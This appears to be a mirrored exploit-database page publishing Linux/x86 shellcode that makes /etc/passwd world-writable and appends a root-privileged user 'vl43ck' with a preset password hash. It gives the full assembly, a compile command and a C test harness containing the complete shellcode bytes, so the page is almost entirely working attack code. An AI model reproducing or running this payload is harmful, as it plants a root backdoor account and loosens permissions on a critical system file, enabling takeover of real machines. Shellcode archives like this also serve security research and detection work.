Registerlinuxx86 add user to etcpasswd shellcode (59 bytes)
▸▸▸ Exploit & Vulnerability >> shellcode exploit & linux_x86 vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) # Date: 2019-10-05 # Exploit Author: sagar.offsec (VL43CK) # Guided by: Touhid M.Shaikh # Designation: Security Consultant at SecureLayer7 # Website: https://www.sagaroffsec.com # Tested on: Ubuntu i386 GNU/LINUX # Shellcode Length: 59 ----------------------(DESCRIPTION)---------------------------- This shellcode will first change /etc/passwd permission to 777 and then add a user "vl43ck" in it with password "test" with root permissions. ----------------------(SHELLCODE DUMP)------------------------- global _start section .text _start: ;chmod 777 /etc/passwd xor eax, eax push eax push 0x64777373 push 0x61702f63 push 0x74652f2f xor ebx, ebp lea ebx, [esp] xor ecx, ecx mov cx, 0x1ff mov al, 0xf int 0x80 ;add user in /etc/passwd ;open /etc/passwd xor eax, eax mov al, 5 xor ecx, ecx mov cx, 2001Q int 0x80 ;write into /etc/passwd xor ebx, ebx mov ebx, eax jmp short call_write write: pop ecx xor eax, eax xor edx, edx mov dx, 132 mov al, 4 int 0x80 ; close /etc/passwd xor eax, eax mov al, 6 int 0x80 ;exit gracefully push eax xor eax, eax mov al, 1 xor ebx, ebx pop ebx int 0x80 call_write: call write shellcode: db "vl43ck:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:vl43ck:/tmp:/bin/bash" ----------------------(COMPILE)------------------------- gcc -m32 -fno-stack-protector -z execstack -o shellcode shellcode.c ----------------------(C-Code)-------------------------- #include<stdio.h> #include<string.h> unsigned char code[] = \ "\x31\xc0\x50\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x31\xeb\x8d\x1c\x24\x31\xc9\x66\xb9\xff\x01\xb0\x0f\xcd\x80\x31\xc0\xb0\x05\x31\xc9\x66\xb9\x01\x04\xcd\x80\x31\xdb\x89\xc3\xeb\x1d\x59\x31\xc0\x31\xd2\x66\xba\x84\x00\xb0\x04\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x50\x31\xc0\xb0\x01\x31\xdb\x5b\xcd\x80\xe8\xde\xff\xff\xff\x76\x6c\x34\x33\x63\x6b\x3a\x24\x36\x24\x62\x78\x77\x4a\x66\x7a\x6f\x72\x24\x4d\x55\x68\x55\x57\x4f\x30\x4d\x55\x67\x64\x6b\x57\x66\x50\x50\x45\x79\x64\x71\x67\x5a\x70\x6d\x2e\x59\x74\x50\x4d\x49\x2f\x67\x61\x4d\x34\x6c\x56\x71\x68\x50\x32\x31\x4c\x46\x4e\x57\x6d\x53\x4a\x38\x32\x31\x6b\x76\x4a\x6e\x49\x79\x6f\x4f\x44\x59\x74\x42\x68\x2e\x53\x46\x39\x61\x52\x37\x63\x69\x51\x42\x52\x43\x63\x77\x35\x62\x67\x6a\x58\x30\x3a\x30\x3a\x30\x3a\x76\x6c\x34\x33\x63\x6b\x3a\x2f\x74\x6d\x70\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"; main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); }
Linuxx86 add user to etcpasswd shellcode (59 bytes) Vulnerability / Exploit Source : Linuxx86 add user to etcpasswd shellcode (59 bytes)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes